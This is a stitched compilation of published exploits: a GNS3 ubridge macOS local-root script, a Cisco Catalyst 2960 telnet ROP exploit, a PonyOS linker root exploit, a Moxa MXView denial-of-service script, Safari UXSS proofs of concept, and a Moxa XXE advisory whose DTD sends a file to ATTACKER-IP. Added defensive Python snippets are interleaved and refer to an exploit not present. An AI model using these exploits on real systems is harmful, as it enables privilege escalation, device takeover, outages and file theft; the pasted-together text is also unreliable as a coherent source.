# Destination NIO listener thread for prdelka has started
# [-] making magic packet client...
# [-] packet fired
# [-] Waiting a minute for the exploit magic...
# -rwsr-xr-x 1 root wheel 1377872 Apr 12 23:32 /tmp/pdkhax
# [-] Got Root?
# # id
# uid=501(hackerfantastic) gid=20(staff) euid=0(root)
#
# -- Hacker Fantastic (www.myhackerhouse.com)
echo "[+] GNS-3 Mac OS-X local root LPE exploit 0day"
echo "[-] creating ubridge.ini file..."
cat > ubridge.ini << EOF
[prdelka]
source_udp = 40000:127.0.0.1:40001
destination_udp = 50000:127.0.0.1:50001
pcap_file = "/usr/lib/cron/tabs/root"
EOF
echo "[-] Launching ubridge.."
/Applications/GNS3.app/Contents/Resources/ubridge &
echo "[-] Preparing cron script..."
cat > /tmp/pdk.sh << EOF
cp /bin/ksh /tmp/pdkhax
chown 0:0 /tmp/pdkhax
chmod 4755 /tmp/pdkhax
EOF
chmod 755 /tmp/pdk.sh
echo "[-] making magic packet client..."
cat > udphax.c << EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
int main(int argc, char* argv[]) {
    struct sockaddr_in si_other, srcaddr;
    int s, slen = sizeof(si_other);
    /* the crontab line ubridge will write verbatim into its pcap_file */
    char* pkt = "\n* * * * * /tmp/pdk.sh\n\n";
    s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    memset((char *) &si_other, 0, sizeof(si_other));
    memset((char *) &srcaddr, 0, sizeof(srcaddr));
    si_other.sin_family = AF_INET;
    si_other.sin_port = htons(50000);
    inet_aton("127.0.0.1", &si_other.sin_addr);
    srcaddr.sin_family = AF_INET;
    srcaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    srcaddr.sin_port = htons(50001);
    bind(s, (struct sockaddr *) &srcaddr, sizeof(srcaddr));
    sendto(s, pkt, strlen(pkt), 0, (struct sockaddr *) &si_other, slen);
    printf("[-] packet fired\n");
    return 0;
}
EOF
gcc udphax.c -o udphax
./udphax
echo "[-] Waiting a minute for the exploit magic..."
rm -rf udphax* ubridge.ini
pkill ubridge
sleep 60
rm -rf /tmp/pdk.sh
ls -al /tmp/pdkhax
echo "[-] Got Root?"
/tmp/pdkhax
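Added example, not part of either exploit above: the path-confinement check a setuid helper like dtappgather (session name used as a directory component under /var/dt/appconfig/appmanager) or ubridge (pcap_file taken straight from an ini file) would need. Function names and the temp-dir layout in demo() are constructed here, and owner_uid defaults to root because that is who owns such base directories in practice.

```python
import os
import stat
import tempfile

class UnsafePathError(ValueError):
    """Raised when a caller-supplied name or path would leave its base directory."""

def is_safe_component(name):
    """True if name is exactly one harmless path component ('.' and '..' are
    the DTUSERSESSION values that walk dtappgather out of its directory)."""
    return bool(name) and name not in (".", "..") and "/" not in name and "\0" not in name

def check_trusted_base(base, owner_uid):
    """Refuse a base that is a symlink, not owned by owner_uid, or group/world
    writable: otherwise it can be replaced by a symlink (the 'ln -sf
    /usr/lib/locale ...' step above) and containment is then measured against
    the attacker's chosen target instead of the real directory."""
    st = os.lstat(base)
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
        raise UnsafePathError("%s is not a real directory" % base)
    if st.st_uid != owner_uid:
        raise UnsafePathError("%s is not owned by uid %d" % (base, owner_uid))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafePathError("%s is group/world writable" % base)

def confine(base, candidate, owner_uid=0):
    """Return the absolute path of candidate inside base, or raise.
    os.path.join drops base when candidate is absolute, so a value like
    ubridge's pcap_file = "/usr/lib/cron/tabs/root" resolves outside base
    and is rejected exactly like a '..' traversal."""
    check_trusted_base(base, owner_uid)
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, candidate))
    if target == base_real or os.path.commonpath([base_real, target]) != base_real:
        raise UnsafePathError("%r escapes %s" % (candidate, base))
    return target

def demo():
    """Classify constructed inputs against a temp layout: a real base dir and a
    symlink posing as the base. Returns {label: 'ok' | 'rejected'}."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "appmanager")
        os.mkdir(base, 0o755)
        link_base = os.path.join(root, "appmanager-link")
        os.symlink(root, link_base)
        me = os.getuid()
        cases = {
            "plain name": (base, "pdkhax"),
            "dot": (base, "."),
            "dotdot": (base, ".."),
            "absolute": (base, os.path.join(root, "cron", "tabs", "root")),
            "symlinked base": (link_base, "pdkhax"),
        }
        for label, (b, cand) in cases.items():
            try:
                confine(b, cand, owner_uid=me)
                results[label] = "ok"
            except UnsafePathError:
                results[label] = "rejected"
    return results
```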
#!/usr/bin/python
# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
# Date: 04.10.2017
# Exploit Author: https://twitter.com/artkond
# Vendor Homepage: https://www.cisco.com/
# Version: IOS version c2960-lanbasek9-mz.122-55.SE11
# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
# CVE : CVE-2017-3881
# Description:
#
# The exploit connects to the Catalyst switch and patches
# its execution flow to allow credless telnet interaction
# with highest privilege level
#
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
elif sys.argv[2] == '--unset':
    set_credless = False
elif sys.argv[2] == '--set':
    pass
else:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Received bytes from telnet service:', repr(s.recv(1024))
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x3d\x55\xdc' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
    payload += '\x00\x00\x99\x9c' # +12 set address of func that rets 1
else:
    payload += '\x00\x04\xea\xe0' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xe1\xa9\xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x7b\x5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x3d\x55\xc8' # +8 r1+8 = 0x23d55c8
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6c\xb3\xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
    payload += '\x00\x27\x0b\x94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
else:
    payload += '\x00\x04\xe7\x78' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x4a\xcf\x98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x14\xe7\xec' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
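Added example, not part of artkond's exploit: a defender-side scan of a captured telnet byte stream for the cluster-option (0x24) subnegotiation the PoC sends, flagging the CISCO_KITS marker, an oversized payload and the long single-byte filler run. MAX_CLUSTER_PAYLOAD is an assumed threshold and SAMPLE_STREAM is constructed here with 'X' bytes in place of the gadget addresses.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
CLUSTER_OPTION = 0x24        # option byte the PoC above sends right after IAC SB
MAX_CLUSTER_PAYLOAD = 64     # assumed threshold; tune to what real cluster peers send

def iter_subnegotiations(data):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE in data.
    A doubled IAC inside the payload is an escaped 0xff data byte."""
    i, n = 0, len(data)
    while i + 2 < n:
        if data[i] != IAC or data[i + 1] != SB:
            i += 1
            continue
        opt, j, payload = data[i + 2], i + 3, bytearray()
        while j < n:
            if data[j] == IAC and j + 1 < n:
                if data[j + 1] == IAC:
                    payload.append(IAC)
                    j += 2
                    continue
                if data[j + 1] == SE:
                    break
            payload.append(data[j])
            j += 1
        else:
            return  # truncated subnegotiation: stop rather than guess
        yield opt, bytes(payload)
        i = j + 2

def longest_byte_run(payload):
    """Longest run of one repeated byte: the PoC pads 116 'A's before the gadgets."""
    best, run, prev = 0, 0, None
    for b in payload:
        run = run + 1 if b == prev else 1
        prev, best = b, max(best, run)
    return best

def classify_cluster_payload(payload, max_len=MAX_CLUSTER_PAYLOAD):
    """Findings for one option-0x24 payload; an empty list means nothing suspicious."""
    findings = []
    if b"CISCO_KITS" in payload:
        findings.append("CISCO_KITS marker")
    if len(payload) > max_len:
        findings.append("oversized payload: %d bytes" % len(payload))
    run = longest_byte_run(payload)
    if run >= 32:
        findings.append("filler run: %d bytes" % run)
    return findings

def scan_telnet_stream(data, max_len=MAX_CLUSTER_PAYLOAD):
    """Return [(payload_length, findings)] for every suspicious cluster suboption."""
    alerts = []
    for opt, payload in iter_subnegotiations(data):
        if opt == CLUSTER_OPTION:
            findings = classify_cluster_payload(payload, max_len)
            if findings:
                alerts.append((len(payload), findings))
    return alerts

# Constructed sample: a benign NAWS (0x1f) 80x24 suboption, then a cluster suboption
# shaped like the PoC (marker, 116-byte filler, ':15:') with 'X' where gadgets would be.
SAMPLE_STREAM = (
    bytes([IAC, SB, 0x1F, 0x00, 0x50, 0x00, 0x18, IAC, SE]) + bytes([IAC, SB, CLUSTER_OPTION])
    + b"\x00\x03CISCO_KITS\x012:" + b"A" * 116 + b"X" * 32 + b":15:" + bytes([IAC, SE])
)
```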
#!/usr/bin/python
#PonyOS 4.0 has added several improvements over previous releases
#including support for setuid binaries and dynamic libraries. The
#run-time linker does not sanitize environment variables when
#running setuid files allowing for local root exploitation through
#manipulated LD_LIBRARY_PATH. Requires build-essential installed
#to compile the malicious library.
import shutil
import os
if __name__ == "__main__":
    print("[+] fluttershy - dynamic linker exploit for ponyos 4.0")
    shutil.copyfile("/usr/lib/libc.so", "/tmp/libc.so")
    shutil.copyfile("/usr/lib/libm.so", "/tmp/libm.so")
    shutil.copyfile("/usr/lib/libpng15.so", "/tmp/libpng15.so")
    shutil.copyfile("/usr/lib/libtoaru-graphics.so", "/tmp/libtoaru-graphics.so")
    shutil.copyfile("/usr/lib/libtoaru-kbd.so", "/tmp/libtoaru-kbd.so")
    shutil.copyfile("/usr/lib/libtoaru-rline.so", "/tmp/libtoaru-rline.so")
    shutil.copyfile("/usr/lib/libtoaru-list.so", "/tmp/libtoaru-list.so")
    shutil.copyfile("/usr/lib/libtoaru-sha2.so", "/tmp/libtoaru-sha2.so")
    shutil.copyfile("/usr/lib/libtoaru-termemu.so", "/tmp/libtoaru-termemu.so")
    shutil.copyfile("/usr/lib/libz.so", "/tmp/libz.so")
    fd = open("/tmp/lib.c", "w")
    fd.write("#include <stdio.h>\n#include <stdlib.h>\n\n")
    fd.write("void toaru_auth_check_pass(char* username, char* password){\n")
    fd.write("\tprintf(\"[+] pony smash!\\n\");\n}\n")
    fd.close()
    os.system("gcc -fpic -c /tmp/lib.c")
    os.system("gcc -shared -o /tmp/libtoaru-toaru_auth.so /tmp/lib.o")
    os.environ["LD_LIBRARY_PATH"] = "/tmp"
    os.system("sudo sh")
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
============
www.moxa.com
Product:
===========
MXView v2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-7456
Security Issue:
================
Remote attackers can DOS the MXView server by sending a large string of junk characters in the user ID and password login fields.
Exploit/POC:
=============
import urllib,urllib2
print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'
IP=raw_input("[Moxa MXView IP]>")
PAYLOAD="A"*200000000
url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})
while 1:
    req = urllib2.Request(url, data)
    res = urllib2.urlopen(req)
    print res
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1094
Once a spread operation is optimized, the function |operationSpreadGeneric| is called from then on. But operationSpreadGeneric tries to get a JSGlobalObject from the argument of the spread operation.
It seems that this optimization is not yet implemented in the release version of Safari.
Tested on the Nightly 10.0.2(12602.3.12.0.1, r210957)
PoC:
-->
<body>
<script>
'use strict';
function spread(a) {
    return [...a];
}
let arr = Object.create([1, 2, 3, 4]);
for (let i = 0; i < 0x10000; i++) {
    spread(arr);
}
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
    f.onload = null;
    try {
        spread(f.contentWindow);
    } catch (e) {
        e.constructor.constructor('alert(location)')();
    }
};
f.src = 'https://abc.xyz/';
</script>
</body>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1084
When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|.
Here's some snippets of that routine.
Structure* InternalFunction::createSubclassStructure(ExecState* exec, JSValue newTarget, Structure* baseClass)
{
    ...
    if (newTarget && newTarget != exec->jsCallee()) {
        // newTarget may be an InternalFunction if we were called from Reflect.construct.
        JSFunction* targetFunction = jsDynamicCast<JSFunction*>(newTarget);
        if (LIKELY(targetFunction)) {
            ...
            return targetFunction->rareData(vm)->createInternalFunctionAllocationStructureFromBase(vm, prototype, baseClass);
            ...
        } else {
            ...
            return vm.prototypeMap.emptyStructureForPrototypeFromBaseStructure(prototype, baseClass);
            ...
        }
    }
    return baseClass;
}
inline Structure* PrototypeMap::createEmptyStructure(JSObject* prototype, const TypeInfo& typeInfo, const ClassInfo* classInfo, IndexingType indexingType, unsigned inlineCapacity)
{
    ...
    Structure* structure = Structure::create(
        prototype->globalObject()->vm(), prototype->globalObject(), prototype, typeInfo, classInfo, indexingType, inlineCapacity);
    m_structures.set(key, Weak<Structure>(structure));
    ...
}
As we can see, |Structure::create| is called with the prototype's |vm| and |globalObject| as arguments, so it can lead to a UXSS condition.
Tested on Safari 10.0.2(12602.3.12.0.1) and WebKit Nightly 10.0.2(12602.3.12.0.1, r210800).
A simpler way:
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
    f.onload = null;
    let g = function () {};
    g.prototype = f.contentWindow;
    let a = Reflect.construct(Function, ['return window[0].eval;'], g);
    let e = a();
    e('alert(location)');
};
f.src = 'https://abc.xyz/';
-->
<body>
<script>
'use strict';
function main() {
    let f = document.body.appendChild(document.createElement('iframe'));
    f.onload = () => {
        f.onload = null;
        let g = function () {};
        g.prototype = f.contentWindow;
        let a = Reflect.construct(Intl.NumberFormat, [], g);
        Intl.NumberFormat.prototype.__lookupGetter__("format").call(a).constructor('alert(location)')();
    };
    f.src = 'https://abc.xyz/';
}
main();
</script>
</body>
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
============
www.moxa.com
Product:
=======================
MX-AOPC UA SERVER - 1.5
Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication.
Vulnerability Type:
==============================
XML External Entity Injection
CVE Reference:
==============
CVE-2017-7457
Security Issue:
================
XML External Entity injection via the ".AOP" files used by MX-AOPC Server results in remote file disclosure if a local user opens
a specially crafted malicious MX-AOPC Server file.
Exploit/POC:
=============
run MX-AOPC UA Server / Runtime / Start Server Runtime Service
a) ATTACKER SERVER LISTENER; as proof of concept we will read the Windows msdfmap.ini file
python -m SimpleHTTPServer 8080
"Evil.AOP" file
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
b) Evil "payload.dtd" file hosted on the ATTACKER SERVER
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
e.g.
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 -
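Added example, not Moxa's code and not part of the advisory: how a consumer of .AOP files can refuse any document carrying a DOCTYPE or entity declarations before parsing it for real, using Python's expat with parameter-entity parsing disabled and an external-entity handler that opens nothing. EVIL_AOP (the shape shown above, with ATTACKER-IP left as the placeholder) and PLAIN_AOP are constructed samples; the aop/tag element names are assumptions, not the real file format.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

class UnsafeXMLError(ValueError):
    """Raised when an .AOP document declares a DOCTYPE or any entity."""

def audit_xml(data):
    """Walk the document with expat while never fetching anything external, and
    record the DOCTYPE name, every entity declaration and every external entity
    reference the parser meets. Parse errors are recorded, not raised."""
    report = {"doctype": None, "entities": [], "external_refs": 0, "error": None}
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        report["entities"].append({"name": name, "parameter": bool(is_param),
                                   "system_id": sysid})

    def on_external_ref(context, base, sysid, pubid):
        report["external_refs"] += 1
        return 1   # report success to expat; nothing is opened or fetched

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        report["error"] = str(e)
    return report

def is_safe_aop(data):
    """A project file needs neither DOCTYPE nor entities; anything else is refused."""
    r = audit_xml(data)
    return (r["doctype"] is None and not r["entities"]
            and r["external_refs"] == 0 and r["error"] is None)

def load_aop(data):
    """Parse only after the audit passes; returns the root element."""
    if not is_safe_aop(data):
        raise UnsafeXMLError("refusing document with DOCTYPE or entity declarations")
    return ET.fromstring(data)

# Constructed samples: the Evil.AOP shape from the advisory (placeholder host kept)
# and a plain project-style file with no DTD at all.
EVIL_AOP = rb"""<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>"""
PLAIN_AOP = b'<?xml version="1.0"?><aop><tag name="t1" address="40001"/></aop>'
```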
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
hyp3rlinx